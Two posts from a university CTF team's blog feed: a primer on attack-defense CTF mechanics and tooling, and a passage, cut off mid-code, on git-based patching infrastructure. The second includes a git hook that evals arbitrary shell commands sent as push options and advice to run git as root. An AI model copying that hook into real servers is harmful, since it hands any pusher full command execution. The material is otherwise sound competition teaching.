<?xml version="1.0" encoding="utf-8"?><feed xmlns="http://www.w3.org/2005/Atom" ><generator uri="https://jekyllrb.com/" version="3.10.0">Jekyll</generator><link href="https://maplebacon.org/feed.xml" rel="self" type="application/atom+xml" /><link href="https://maplebacon.org/" rel="alternate" type="text/html" /><updated>2026-01-14T15:34:44+00:00</updated><id>https://maplebacon.org/feed.xml</id><title type="html">CTF @ UBC</title><subtitle>UBC&apos;s CTF team</subtitle><entry><title type="html">A primer on Attack Defense CTFs</title><link href="https://maplebacon.org/2025/09/maple-attack-defense-primer/" rel="alternate" type="text/html" title="A primer on Attack Defense CTFs" /><published>2025-09-23T00:00:00+00:00</published><updated>2025-09-23T00:00:00+00:00</updated><id>https://maplebacon.org/2025/09/maple-attack-defense-primer</id><content type="html" xml:base="https://maplebacon.org/2025/09/maple-attack-defense-primer/"><![CDATA[<h2 id="introduction-and-target-audience">Introduction and Target Audience</h2>

<p>Hi! If you’re reading this, it means you’re at least a <em>little</em> curious about Attack/Defense CTFs.</p>

<p>This guide assumes that you are familiar with:</p>
<ul>
  <li>the concept of Capture The Flag competitions (at least Jeopardy CTFs)</li>
  <li>what a flag looks like and how to find one</li>
</ul>

<p>If you’re still here, strap in tight while we explore what the heck an Attack Defense CTF is.</p>

<h2 id="flavours-of-ctfs">Flavours of CTFs</h2>

<p>CTFs come in many flavours. The most common are Jeopardy, followed by Attack-Defense, and on rare occasions HackQuests (shout-out to Hackceler8!). Each of these competition types requires a different set of cybersecurity skills.</p>

<ul>
  <li>
    <p><strong>Jeopardy</strong>: This is the most common type of CTF. Players pick from a list of challenges in different categories (Web, Crypto, Pwn, Rev, Misc). These challenges are hosted on a central server. Teams earn points by attacking a challenge on the server and retrieving a flag. The competitions generally run for 24 to 48 hours and don’t require active involvement throughout. Famous Jeopardy CTFs include CSAW CTF, Plaid CTF, and Maple CTF :)</p>
  </li>
  <li>
    <p><strong>Attack-Defense</strong>: The original CTF type. Each team is assigned a server in a shared network. Each server starts by hosting the same set of vulnerable services. Each round or tick (1-5 minutes long), teams can gain points by attacking the services hosted on other teams’ servers to retrieve flags, and by defending their own services against attacks from other teams by patching out vulnerabilities <em>without</em> breaking core functionality. The team with the most points after X ticks wins! These competitions last around 6 to 10 hours and often require active player involvement. Popular A/D CTFs include DEF CON CTF, ENOWARS, and FAUST CTF.</p>
  </li>
  <li>
    <p><strong>HackQuests</strong>: This is just an example to demonstrate that CTFs don’t always fit in the above categories. A popular HackQuest is Hackceler8 (Google CTF Finals). In this competition, players are incentivized to find glitches in custom (retro) video games in order to achieve the fastest speedruns.</p>
  </li>
</ul>

<h2 id="attack-defense-ctfs">Attack-Defense CTFs</h2>

<p>This is a more in-depth section that covers the specific details about Attack Defense (A/D) CTFs.</p>

<h3 id="game-duration--ticks">Game Duration &amp; Ticks</h3>

<p>An Attack-Defense CTF typically runs for about 8 hours. It is played in rounds of 1 to 5 minutes, each called a <strong>tick</strong>.</p>

<p>A game that starts at <code class="language-plaintext highlighter-rouge">14:00</code> with <code class="language-plaintext highlighter-rouge">5</code>-minute ticks will look as follows:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>+--------+----------------+
|  TICK  |     TIME       |
|--------+----------------|
|TICK 1  | 14:00 to 14:04 |
|--------+----------------|
|TICK 2  | 14:05 to 14:09 |
|--------+----------------|
|TICK 3  | 14:10 to 14:14 |
|--------+----------------|
|  ...   |      ...       |
+--------+----------------+

</code></pre></div></div>
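<p>The same schedule can be computed rather than read off a table. The following is a minimal sketch, assuming ticks are numbered from 1 and run back to back from the game start; the function names and the calendar date are made up for illustration, and a real gameserver may define tick boundaries differently.</p>

```python
from datetime import datetime, timedelta


def tick_window(game_start, tick_minutes, tick):
    """Return the (first minute, last minute) covered by a 1-indexed tick."""
    if tick < 1:
        raise ValueError("ticks are numbered from 1")
    begin = game_start + timedelta(minutes=tick_minutes * (tick - 1))
    end = begin + timedelta(minutes=tick_minutes - 1)
    return begin, end


def current_tick(game_start, tick_minutes, now):
    """Return the 1-indexed tick that the moment `now` falls into."""
    elapsed = now - game_start
    return int(elapsed // timedelta(minutes=tick_minutes)) + 1


# Hypothetical date; only the 14:00 start and 5-minute ticks come from the text.
start = datetime(2025, 1, 1, 14, 0)
for tick in range(1, 4):
    begin, end = tick_window(start, 5, tick)
    print(f"TICK {tick}: {begin:%H:%M} to {end:%H:%M}")
```

<p>A helper like <code class="language-plaintext highlighter-rouge">current_tick</code> is handy when your tooling needs to know which tick a captured flag or packet belongs to.</p>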

<h3 id="the-game-network--your-vulnbox">The Game Network &amp; Your Vulnbox</h3>

<p>When you register for an Attack-Defense competition, each team is assigned a server. This server is referred to as a <strong>Vulnbox</strong>. This <a href="http://box.urbanup.com/151562">“box”</a>  hosts a set of vulnerable <em>services</em> that your team attempts to defend.</p>

<p>The core of an A/D CTF is the <strong>Game Network</strong>. It refers to the computer network that connects all the team boxes to each other. That is, it allows you to access the services on other teams’ boxes and allows other teams to access the services on your box. Aside from vulnboxes, it also hosts a central <em>gameserver</em>.</p>

<p>The method used to host services varies from CTF to CTF. It can range from using docker compose for each service to having a VM for each service.</p>

<p>(TODO: add photo of game network and examples of CTFs with docker compose)</p>

<h3 id="vpns-vulnbox-setup-and-whatnot">VPNs, vulnbox setup and whatnot</h3>

<p>To connect your vulnbox to the game network and access game resources like the flag submitter or an internal scoreboard, competitions provide you with a <strong>VPN configuration</strong>, for example in the form of a <a href="https://www.wireguard.com/quickstart/">WireGuard</a> configuration. You can also use this VPN configuration to submit flags or even attack other teams from your local machine, which saves compute resources on your vulnbox.</p>

<p>Vulnbox setup differs between competitions. Some competitions like ENOWARS have historically provided teams with a virtual machine as their vulnbox with minimal setup required; others like FAUST CTF expect you to provide your own machine, connect it to the game network, and apply a VM image to set your vulnbox up.</p>

<h3 id="services">Services</h3>
<p>A <strong>service</strong> in an A/D CTF refers to a computer program/application that contains one or more vulnerabilities. A service can be considered the A/D analogue of a challenge in a Jeopardy CTF.</p>

<p>Similar to challenges in a Jeopardy CTF, services can fall into one or more categories such as Web, Crypto, Pwn, Rev, etc. They may come with source code, or with only a binary executable for your team to reverse and exploit.</p>

<p>Here are a few examples of services:</p>
<ul>
  <li><a href="https://github.com/enowars/enowars8-service-piratesay">piratesay</a>: From ENOWARS 8, this service mimics a pirate-themed dark web forum where users can chat and brag about exploits. The service falls into the pwn category and only provides a binary executable.</li>
  <li><a href="https://github.com/Nautilus-Institute/finals-2025/tree/main/nautro">nautro</a>: From DEF CON 33 CTF, a Balatro-like resource management card game where players attempt to maximize their resources by playing cards. This service falls into the miscellaneous category and only provides a binary executable.</li>
  <li><a href="https://github.com/fausecteam/faustctf-2024-quickr-maps/tree/master/checker">quickr-maps</a>: From FAUST CTF 2024, a location sharing application with an API. This falls into the Web category, and it contains the Go/Python source code.</li>
</ul>

<p>Note: The above services are all of the Attack-Defense type. Services can also use the “King of The Hill” format for scoring.</p>

<h3 id="king-of-the-hill-koth">King of The Hill (KotH)</h3>

<p>TODO at a later date.</p>

<p>No attack or defense involved. Services revolve around scoring the highest number of points among all teams. It’s typically only seen in smaller A/D competitions like DEF CON CTF (12 teams).</p>

<h3 id="scoring-points">Scoring Points</h3>

<p>There are 3 ways to score points in an A/D CTF. Each competition weights these components differently.</p>

<p>For each tick, you can win points from:</p>
<ul>
  <li><strong>Attack Points</strong>: Points you gain from exploiting another team’s service and submitting their flag. The more teams you exploit, the more points you gain.</li>
  <li><strong>Defense Points</strong>: Points you gain if no other team (fully) exploits your service. One service might have multiple flags.</li>
  <li><strong>SLA Points</strong>: Points you gain by having an active and reachable service which passes a set of tests from the gameserver.</li>
</ul>

<p>At any given tick, each of your services might be in the following states (varies between CTFs):</p>

<ul>
  <li><code class="language-plaintext highlighter-rouge">OK</code>: Everything working fine</li>
  <li><code class="language-plaintext highlighter-rouge">DOWN</code>: Service not running or another error in the network connection, e.g. a timeout or connection abort</li>
  <li><code class="language-plaintext highlighter-rouge">FAULTY</code>: Service is available, but not behaving as expected (fails SLA)</li>
  <li><code class="language-plaintext highlighter-rouge">FLAG_NOT_FOUND</code>: Service is behaving as expected, but a flag could not be retrieved</li>
  <li><code class="language-plaintext highlighter-rouge">RECOVERING</code>: Service is behaving as expected, at least one flag could be retrieved, but one or more from previous ticks could not.</li>
</ul>

<p>(adapted from https://ctf-gameserver.org/checkers/#check-results)</p>

<h3 id="the-gameserver">The Gameserver</h3>
<p>The <strong>gameserver</strong> is a machine/set of machines in the <em>game network</em> that plays a variety of roles.</p>

<p>It is responsible for:</p>
<ul>
  <li>Placing flags in your services every tick</li>
  <li>Running tests against each service every tick. (SLA)</li>
  <li>Flag submission</li>
  <li>Providing additional information about services if required.</li>
  <li>Anonymizing web traffic (sometimes)</li>
</ul>

<h3 id="attacking-services-attack-info-and-flag-stores">Attacking Services, Attack Info and Flag stores</h3>
<p>Attacking a service is similar to exploiting a challenge in a Jeopardy CTF. The general workflow is to find a vulnerability, then exploit it to retrieve the flag.</p>

<p>A service can contain multiple flags; the location of each flag is often referred to as a <strong>flag store</strong>. An example of a flag store in <code class="language-plaintext highlighter-rouge">piratesay</code> from earlier would be the secrets file associated with each user account on the web forum. The same service also has another flag store in the form of <code class="language-plaintext highlighter-rouge">.treasure</code> files, which are password-protected.</p>

<p>It is not always obvious where the flag stores are. However, examining the source code or reverse engineering the service helps. More on this in the later sections.</p>

<p><strong>Attack Info</strong> is a special and very important API endpoint on the gameserver that provides useful information about the flag stores for each Team’s service for the last few ticks. This can be in the form of user IDs, file paths, and more.</p>

<p><strong>Attack Info</strong> is typically presented as a large JSON document with roughly the following schema (it varies from CTF to CTF):</p>

<pre><code class="language-JSON">{
    "team1": {
        "tick n":
            {
                "flagstore 1": ["data"],
                "flagstore 2": ["more", "data"]
            }, 
        "tick n-1":
            {
                "flagstore 1": ["otherdata"],
                "flagstore 2": ["dead", "beef"]
            }, 
        "tick n-3":
            {
                "flagstore 1": ["data"],
                "flagstore 2": ["deadbeef", "face"]
            }
    },
    "team2": { ... },
    "team3": { ... },
    ...
}
</code></pre>

<p>Here is a real example of the attack info from ENOWARS 9 (timetype), which displayed the Attack Info for the last 10 ticks:</p>
<pre><code class="language-JSON">{
...
 "10.1.26.1": {
        "205": {
          "1": [
            "hlU9y0DChKvoaWz"
          ],
          "2": [
            "PBPXITUPPU"
          ]
        },
        "206": {
          "1": [
            "4PZafbjfHLguKBX"
          ],
          "2": [
            "A460UZVSHR"
          ]
        },
        "207": {
          "1": [
            "VbaVyFL82Gi"
          ],
          "2": [
            "6KTHS66AUK"
          ]
        },
        "208": {
          "1": [
            "CsYkxqsbmu0"
          ],
          "2": [
            "PKFTDKIFPR"
          ]
        },
        "209": {
          "1": [
            "jOE2Vs2H"
          ],
          "2": [
            "59ZZEVTEK6"
          ]
        },
        "210": {
          "1": [
            "mPC5pP9JOEmb5W"
          ],
          "2": [
            "XUVI2O4HQO"
          ]
        },
        "211": {
          "1": [
            "umbqwFv4VkOw"
          ]
        },
        "212": {
          "1": [
            "6fHMlCfIbmZ1HG"
          ],
          "2": [
            "M9LGS3ZSEB"
          ]
        },
        "213": {
          "1": [
            "GBtSMPAv"
          ],
          "2": [
            "8U57UI01UA"
          ]
        },
        "214": {
          "1": [
            "H8Tu4MelKHHU9"
          ],
          "2": [
            "5JXUWCCXW7"
          ]
        }
      },
...
}

</code></pre>
<p><strong>Note:</strong> some A/D CTFs do not have Attack Info endpoints.</p>

<p>If a CTF <em>does</em> have this endpoint, it’s <strong>ALWAYS</strong> a good idea to check it for useful information that helps you understand and exploit a challenge.</p>
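<p>Since the attack info is nested by team, then tick, then flag store, exploit scripts usually flatten it into a list of targets first. Here is a minimal sketch of that, assuming the team/tick/flag store layout shown above; the function name <code class="language-plaintext highlighter-rouge">iter_targets</code> and the <code class="language-plaintext highlighter-rouge">own_team</code> parameter are hypothetical, and the sample is a trimmed copy of the ENOWARS data. How you fetch the JSON depends on the CTF.</p>

```python
import json


def iter_targets(attack_info, own_team=None):
    """Yield (team, tick, flagstore, hint) for every entry in the attack info."""
    for team, ticks in attack_info.items():
        if team == own_team:
            continue  # no point in attacking ourselves
        for tick, flagstores in ticks.items():
            for flagstore, hints in flagstores.items():
                for hint in hints:
                    yield team, tick, flagstore, hint


# Trimmed copy of the example above; a real script would download this JSON.
sample = json.loads("""
{
  "10.1.26.1": {
    "213": {"1": ["GBtSMPAv"], "2": ["8U57UI01UA"]},
    "214": {"1": ["H8Tu4MelKHHU9"], "2": ["5JXUWCCXW7"]}
  }
}
""")

for team, tick, flagstore, hint in iter_targets(sample):
    print(team, tick, flagstore, hint)
```

<p>Each yielded tuple is one thing your exploit can go after: a team, the tick the flag was placed in, and the hint (user ID, file path, ...) that tells you where to look.</p>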

<p>Finally, it’s important to make sure that your exploits can run fast enough to retrieve the flag before it expires. Flags expire after X ticks. (X is set by the A/D CTF).</p>

<h3 id="defending-services-and-patching">Defending Services and Patching</h3>
<p>So, you found a vulnerability in your service. Now what? Well, you get to <strong>patch</strong> it.</p>

<p>Depending on the service and the game setup which varies from CTF to CTF, patching ranges from being a trivial task to annoyingly tedious.</p>

<p><strong>If patching source code:</strong> If your patch involves modifying source code written in Python/Go/Java/etc., it’s simply a matter of changing the code, recompiling the program if necessary, and restarting the service (via docker compose or VMs).</p>

<p><strong>If patching a binary (binpatching):</strong> If your patch needs to be applied on a binary executable, you would need to use a utility like <a href="https://docs.pwntools.com/en/stable/elf/elf.html">pwntools patching</a> or <a href="https://github.com/NixOS/patchelf">patchelf</a> to patch the bytes/assembly code.</p>
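<p>To give a feel for what “patching the bytes” means, here is a minimal sketch that uses only the Python standard library rather than pwntools or patchelf. The offset and the instruction bytes are invented for illustration; in a real service you would locate them with a disassembler first.</p>

```python
def patch_bytes(image, offset, expected, replacement):
    """Return a copy of `image` with `expected` at `offset` swapped for `replacement`."""
    if len(expected) != len(replacement):
        raise ValueError("replacement must keep the same length so later offsets do not shift")
    if image[offset:offset + len(expected)] != expected:
        raise ValueError("unexpected bytes at offset; wrong binary or already patched?")
    patched = bytearray(image)
    patched[offset:offset + len(replacement)] = replacement
    return bytes(patched)


# Hypothetical x86 snippet: nop; jne +5; ret
original = b"\x90\x75\x05\xc3"
# Replace the 2-byte conditional jump with two NOPs so the branch is never taken.
patched = patch_bytes(original, 1, b"\x75\x05", b"\x90\x90")
print(patched.hex())  # 909090c3
```

<p>Checking the expected bytes before writing is a cheap guard against patching the wrong offset or patching the same binary twice.</p>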

<p>Note that when you “push” your patch to your service, you might have to take it down for a tick, losing out on sweet, sweet SLA points. Even if your service “recovers”, you might end up failing the SLA.</p>

<h3 id="the-service-level-agreement-sla">The Service Level Agreement (SLA)</h3>

<p>At this point, you might wonder why you cannot patch your service by disabling access to all features. The issue is that you might fail the SLA.</p>

<p>As mentioned earlier, a <strong>Service Level Agreement (SLA)</strong> is a set of tests that the gameserver runs against your services every tick. These tests are intended to ensure that your service still maintains its core features. A messaging app should be able to send/receive messages, a game about cards should allow you to play the cards, and so on.</p>

<p>If your services pass these tests, your team receives points for having a functional service.
If your services fail these tests, your team does not receive SLA points or defense points.</p>

<h3 id="the-secret-other-thing-network-traffic-analysis">The Secret Other Thing: Network Traffic Analysis</h3>

<p>A team’s biggest asset for Attack/Defense CTFs is the network traffic it receives from other teams.</p>

<p>Each tick, your team is able to capture the packets sent to it in the form of <strong><a href="https://en.wikipedia.org/wiki/Pcap">PCAPs</a></strong>.</p>

<p>Analyzing the payloads that other teams send to your service is extremely insightful. This data can help you find vulnerabilities in your services by showing you where to look in the service’s code. This information can also help you learn more about the service as well as help you write exploits to attack other teams. PCAPs can also be useful to identify how other teams might be stepping around your patches to services.</p>

<p>Traffic analysis is an essential tool to succeed at Attack-Defense CTFs. Teams often have extensive infrastructure dedicated to capturing and analyzing packets.</p>

<h3 id="flag-submission">Flag submission</h3>

<p>Once you have captured flags (haha), you need to submit them to receive points for the tick. It’s generally as simple as sending newline-separated flags to a port on the submission server.</p>

<p>More details can be found <a href="https://ctf-gameserver.org/submission/">here</a>. It does a much better job at explaining the internals of flag submitters if you’re interested.</p>
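<p>As a rough illustration of the “newline-separated flags to a port” idea, here is a minimal sketch using a plain TCP socket. The function name is hypothetical, and the exact protocol (welcome banners, per-flag responses, when the connection closes) differs between gameservers, so treat this as a starting point rather than a drop-in submitter.</p>

```python
import socket


def submit_flags(host, port, flags, timeout=5.0):
    """Send newline-separated flags and return whatever the server answers."""
    payload = "".join(f"{flag}\n" for flag in flags).encode()
    chunks = []
    with socket.create_connection((host, port), timeout=timeout) as conn:
        conn.sendall(payload)
        conn.shutdown(socket.SHUT_WR)  # signal that no more flags follow
        while True:
            try:
                data = conn.recv(4096)
            except socket.timeout:
                break  # server kept the connection open; stop waiting
            if not data:
                break
            chunks.append(data)
    return b"".join(chunks).decode(errors="replace")
```

<p>A call would look like <code class="language-plaintext highlighter-rouge">submit_flags("10.0.0.1", 1337, flags)</code>, where the address and port are placeholders for whatever the competition announces.</p>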

<h2 id="ad-infrastructure">AD Infrastructure</h2>

<p>To succeed in an Attack-Defense CTF, you must have infrastructure/tooling to automate/avoid repetitive tasks. The <strong>infrastructure</strong> can range from something as simple as a bash script that helps you submit flags to a bespoke application built from the ground up to efficiently analyze PCAPs.</p>

<p>Having access to tooling during the competition enables your team to focus more of its precious resources on looking at services rather than remembering to run an exploit script every tick.</p>

<p>Infrastructure can define the difference between winning and losing a game. Naturally, many teams are secretive about the tools/infrastructure that they use.</p>

<p>Let’s go through a few common tools many teams would use:</p>

<h3 id="throwers">Throwers</h3>
<p>A <strong>thrower</strong> is a tool that runs your exploit script against all the other boxes on the network and submits received flags for you. It’s a great abstraction that takes care of:</p>

<ul>
  <li>Running exploits against each team</li>
  <li>Using the team-specific and tick-specific information about a service (attack info)</li>
  <li>Submitting flags</li>
</ul>

<p>A thrower might take the form of an <em>exploit template</em> that members can write and throw exploits with.</p>

<p>A popular “off-the-shelf” thrower is <a href="https://github.com/OpenAttackDefenseTools/ataka">ataka</a>.</p>
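<p>To make the idea concrete, here is a minimal sketch of the core loop of a thrower, written independently of any existing tool. Everything named here is an assumption for illustration: the flag format <code class="language-plaintext highlighter-rouge">FLAG{...}</code>, the target addresses, and the <code class="language-plaintext highlighter-rouge">fake_exploit</code> stand-in. A real thrower would also run exploits in parallel, enforce timeouts, and feed in attack info.</p>

```python
import re

FLAG_RE = re.compile(r"FLAG\{[A-Za-z0-9_]+\}")  # hypothetical flag format


def throw(exploit, targets, submit):
    """Run `exploit` against every target, extract flags and submit the new ones."""
    seen = set()
    for target in targets:
        try:
            output = exploit(target)
        except Exception as err:  # one broken target must not stop the round
            print(f"{target}: exploit failed ({err})")
            continue
        flags = set(FLAG_RE.findall(output)) - seen
        if flags:
            submit(sorted(flags))
            seen |= flags
    return seen


def fake_exploit(target):
    """Stand-in for a real exploit: pretends one team's service is down."""
    if target == "10.0.0.3":
        raise ConnectionError("service down")
    return "welcome! FLAG{" + target.replace(".", "_") + "}"


submitted = []
throw(fake_exploit, ["10.0.0.2", "10.0.0.3", "10.0.0.4"], submitted.append)
print(submitted)
```

<p>Keeping the exploit as a plain function that takes a target and returns raw output is what lets team members write exploits without caring about submission or error handling.</p>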

<h3 id="pcap-analyzers">PCAP Analyzers</h3>

<p>A <strong>PCAP Analyzer</strong> is an application that is used to tag, view, filter, and analyze Packet Capture data uploaded to it. These tools often have UIs where you are able to filter for and tag certain patterns in a packet such as <code class="language-plaintext highlighter-rouge">path_traversal</code> when you see a pattern of <code class="language-plaintext highlighter-rouge">../../../</code>.
By filtering through and monitoring data sent to services, you can gain a clearer understanding of how services work and how to approach exploiting/patching them.</p>
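<p>The tagging idea itself is simple enough to sketch in a few lines. The example below assumes you already have the raw payload bytes of a request (extracting them from a PCAP is a separate step) and applies regular-expression rules to them; the <code class="language-plaintext highlighter-rouge">sql_keyword</code> rule and the function name are hypothetical additions, and real analyzers are considerably more elaborate.</p>

```python
import re

TAG_RULES = {
    # Three or more "../" in a row, as in the path traversal example above
    "path_traversal": re.compile(rb"(\.\./){3,}"),
    # Hypothetical extra rule, added only to show that rules compose
    "sql_keyword": re.compile(rb"(?i)union\s+select"),
}


def tag_payload(payload):
    """Return the sorted names of all rules whose pattern occurs in the payload."""
    return sorted(tag for tag, pattern in TAG_RULES.items() if pattern.search(payload))


print(tag_payload(b"GET /download?file=../../../etc/passwd HTTP/1.1"))
print(tag_payload(b"GET /index.html HTTP/1.1"))
```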

<p>There are plenty of popular “off-the-shelf” PCAP analyzers. The most commonly used tool is <a href="https://github.com/OpenAttackDefenseTools/tulip">Tulip</a>.</p>

<h3 id="patcher">Patcher</h3>
<p>A <strong>Patcher</strong> is a nice-to-have tool that lets you reliably patch services during a competition and avoid the need to SSH into the vulnbox each time.</p>

<p>There are many solutions to patching. One such solution is to use git. You can read more about this in our previous writeup <a href="https://maplebacon.org/2024/09/faustctf-patcher/">Patching infrastructure for attack-defense CTFs</a>.</p>

<h3 id="anything-you-find-useful-d">Anything you find useful :D</h3>
<p>Yeah. What the title says. Tooling is an iterative process. As you compete in more CTFs, you find more use cases and notice functionality that is missing from existing tools.</p>

<p>It’s a very exciting experience to build your own tooling from scratch that’s custom-built for a CTF. Maybe you feel that you’re basically a copy-pasting machine between your code editor and ChatGPT? Try writing a tool to automate triage with LLMs! There is infinite potential for new tools you never knew you needed :D</p>

<h2 id="an-important-conclusion">An Important Conclusion</h2>

<p>Overwhelmed? It’s a lot of information to process in a single page. The best way to learn is to participate in competitions and learn as you go. The most exciting part is failing, iterating, and improving over the years.</p>

<p>Each step towards improving your team’s processes, communication, tooling, and strategy for allocating people to services is a step towards growth. Remember that the most important rule in CTFing is to have fun &lt;3</p>

<h2 id="resources">Resources</h2>
<ul>
  <li><a href="https://glitchrange.com/attack-defense">https://glitchrange.com/attack-defense</a>: A quick overview of A/D CTFs.</li>
  <li><a href="https://2025.faustctf.net/information/attackdefense-for-beginners/">https://2025.faustctf.net/information/attackdefense-for-beginners/</a>: Rules and the setup of a real Attack Defense CTF</li>
  <li><a href="https://ctf-gameserver.org/">https://ctf-gameserver.org/</a>: An excellent resource going over organizing Attack Defense CTFs</li>
</ul>]]></content><author><name>hiswui</name></author><summary type="html"><![CDATA[Introduction and Target Audience]]></summary></entry><entry><title type="html">[FAUST 2024] Patching infrastructure for attack-defense CTFs</title><link href="https://maplebacon.org/2024/09/faustctf-patcher/" rel="alternate" type="text/html" title="[FAUST 2024] Patching infrastructure for attack-defense CTFs" /><published>2024-09-30T00:00:00+00:00</published><updated>2024-09-30T00:00:00+00:00</updated><id>https://maplebacon.org/2024/09/faustctf-patcher</id><content type="html" xml:base="https://maplebacon.org/2024/09/faustctf-patcher/"><![CDATA[<p>This is a writeup of the patching setup Maple Bacon used in FAUST 2024.</p>

<p>This last weekend, we played in <a href="https://2024.faustctf.net/">FAUST CTF 2024</a>. While we were limited on manpower &amp; had to scramble about with challenges, it was still quite a lot of fun.</p>

<p>FAUST provided eight challenges:</p>
<ul>
  <li><code class="language-plaintext highlighter-rouge">floppcraft</code>: xxe + ssrf + fixed jwt signing</li>
  <li><code class="language-plaintext highlighter-rouge">quickr-maps</code>: url injection + ssrf, flags plotted as QR codes</li>
  <li><code class="language-plaintext highlighter-rouge">secretchannel</code>: bit flipping token id</li>
  <li><code class="language-plaintext highlighter-rouge">todo-list</code>: user id collision</li>
  <li><code class="language-plaintext highlighter-rouge">lvm</code>: type confusion pwn</li>
  <li><code class="language-plaintext highlighter-rouge">asm-chat</code>: insecure session handling</li>
  <li><code class="language-plaintext highlighter-rouge">missions</code>: cache shenanigans</li>
  <li><code class="language-plaintext highlighter-rouge">vault</code>: hardcoded rsa n</li>
</ul>

<p>Out of those, no one was able to exploit one (<code class="language-plaintext highlighter-rouge">lvm</code>), and only a handful of teams had an exploit for another (<code class="language-plaintext highlighter-rouge">missions</code>). We had working exploits for three: <code class="language-plaintext highlighter-rouge">floppcraft</code>, <code class="language-plaintext highlighter-rouge">todo-list</code>, and <code class="language-plaintext highlighter-rouge">asm_chat</code>, and had a nearly-working exploit for <code class="language-plaintext highlighter-rouge">quickr-maps</code>. We were able to patch <code class="language-plaintext highlighter-rouge">floppcraft</code> and <code class="language-plaintext highlighter-rouge">asm_chat</code> entirely, and partially patch <code class="language-plaintext highlighter-rouge">quickr-maps</code>, <code class="language-plaintext highlighter-rouge">todo-list-service</code>, and <code class="language-plaintext highlighter-rouge">vault</code>. We placed 27th, but peaked at 20th (when our exploits were all mostly working). Overall pretty alright! Not our best performance, but it was the first time we had played in an A/D CTF in a while.</p>

<p>I handled defense + patching + network analysis infrastructure. We used an entirely new system for patching that worked quite well (despite putting it together a week before the competition) - so I figured I’d write up a little something on it.</p>

<h2 id="design">Design</h2>

<p>In previous years, we’ve managed patching by SSHing into the box and manually editing the appropriate files + rebuilding. This sucks, for everyone involved - and if patches are more than a couple of lines long, it <em>really</em> sucks. We’ve used Git for ease of rollback / version history, but only to <em>track</em> services on the box itself. This got me thinking: could we just… set up a Git server on the box and push patches directly to it? We would need some way to treat a normal repo as an origin, though. And the Git server expects its origin repositories to be “bare”. So that wouldn’t work directly.</p>

<p>Or would it? As it turns out, the “bare” requirement is <a href="https://stackoverflow.com/a/28381311/11087133"><em>just a configuration option</em></a> and can be disabled. Treating an ordinary Git repository as an origin repo has several issues to watch out for, however: every file must be owned by the <code class="language-plaintext highlighter-rouge">git</code> user and you <em>cannot</em> have working/staged changes in the origin repository. But that’s it. Otherwise, it works fine. Ownership issues can be circumvented by treating the <code class="language-plaintext highlighter-rouge">git</code> user as <code class="language-plaintext highlighter-rouge">root</code>: not the best security practice, for sure, but fine for a team-internal server. This will let authorized users clone services with <code class="language-plaintext highlighter-rouge">git clone git@&lt;box-ip&gt;:/srv/&lt;service&gt;</code>, develop patches locally, and push their changes with <code class="language-plaintext highlighter-rouge">git push</code>.</p>

<p>Typically, services will need to be rebuilt for changes to be applied. While this is a nicer design for pushing <em>patches</em>, deploying those patches still means SSHing into the box, navigating to the challenge, and running <code class="language-plaintext highlighter-rouge">docker-compose up -d --build</code> or similar. Can this process be made any more streamlined?</p>

<p>As it turns out - Git has <a href="https://git-scm.com/docs/githooks">a rich <em>hooks</em> system</a> that we can adapt for our purposes. These hooks can run at arbitrary points in the Git workflow process - but the two we’re interested in are <code class="language-plaintext highlighter-rouge">pre-receive</code> and <code class="language-plaintext highlighter-rouge">post-receive</code>, as they are the only hooks that can take <em>user-specified parameters</em> (with the <code class="language-plaintext highlighter-rouge">--push-option</code> flag). The <code class="language-plaintext highlighter-rouge">pre-receive</code> hook runs immediately upon receiving a <code class="language-plaintext highlighter-rouge">git push</code>. The <code class="language-plaintext highlighter-rouge">post-receive</code> hook runs immediately after all new references are processed, and <em>only</em> if a reference was updated as a result. This isn’t perfect - it would be convenient if we could run the hook regardless of push success, so that in case a deploy fails at first we can run another commit - but it will suffice.</p>

<p>Creating a custom <code class="language-plaintext highlighter-rouge">post-receive</code> hook is straightforward. The Git documentation provides an example hook, which we can modify to serve our purposes:</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">#!/bin/sh</span>
<span class="c">#</span>
<span class="c"># A hook script to execute arbitrary code from push options.</span>
<span class="c"># This script will run when a new push is successful and the</span>
<span class="c"># --push-option flag has been used at least once.</span>
<span class="c"># It will execute the commands in the push-option in sequence.</span>

<span class="k">if </span><span class="nb">test</span> <span class="nt">-n</span> <span class="s2">"</span><span class="nv">$GIT_PUSH_OPTION_COUNT</span><span class="s2">"</span>
<span class="k">then
    </span><span class="nv">i</span><span class="o">=</span>0
    <span class="k">while </span><span class="nb">test</span> <span class="s2">"</span><span class="nv">$i</span><span class="s2">"</span> <span class="nt">-lt</span> <span class="s2">"</span><span class="nv">$GIT_PUSH_OPTION_COUNT</span><span class="s2">"</span>
    <span class="k">do</span> <span class="c"># this is exceptionally ugly but needed for indirect variables</span>
        <span class="nb">eval</span> <span class="s2">"action=</span><span class="se">\$</span><span class="s2">GIT_PUSH_OPTION_</span><span class="nv">$i</span><span class="s2">"</span>
        <span class="nb">echo</span> <span class="s2">"</span><span class="nv">$action</span><span class="s2">"</span>
        <span class="nb">eval</span> <span class="s2">"</span><span class="nv">$action</span><span class="s2">"</span>
        <span class="nv">i</span><span class="o">=</span><span class="k">$((</span>i <span class="o">+</span> <span class="m">1</span><span class="k">))</span>
    <span class="k">done
fi</span>
</code></pre></div></div>

<p>This hook must be placed in <code class="language-plaintext highlighter-rouge">.git/hooks/post-receive</code>, and be made executable. If desired, hooks can be installed <em>globally</em> by setting the global <code class="language-plaintext highlighter-rouge">core.hooksPath</code> configuration option. This is convenient for our purposes. Now, arbitrary build commands can be executed after a (successful) push with, for example, <code class="language-plaintext highlighter-rouge">git push --push-option="docker-compose up -d --build"</code>.</p>
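<p>For readers who find the indirect-variable trick in the shell hook hard to follow, here is a rough Python rendering of the same logic. It is a sketch for explanation only, not the hook we deployed: it reads <code class="language-plaintext highlighter-rouge">GIT_PUSH_OPTION_COUNT</code> and the numbered <code class="language-plaintext highlighter-rouge">GIT_PUSH_OPTION_&lt;i&gt;</code> variables that Git sets for the hook, then runs each one through the shell. The function names are made up.</p>

```python
import os
import subprocess


def push_options(env=os.environ):
    """Collect GIT_PUSH_OPTION_0 .. GIT_PUSH_OPTION_<count-1> in order."""
    count = int(env.get("GIT_PUSH_OPTION_COUNT") or 0)
    return [env[f"GIT_PUSH_OPTION_{i}"] for i in range(count)]


def run_push_options(env=os.environ):
    """Echo and execute each push option as a shell command, in sequence."""
    for action in push_options(env):
        print(action)
        # Like the eval in the shell hook, this runs arbitrary commands
        # chosen by whoever is allowed to push.
        subprocess.run(action, shell=True, check=False)


if __name__ == "__main__":
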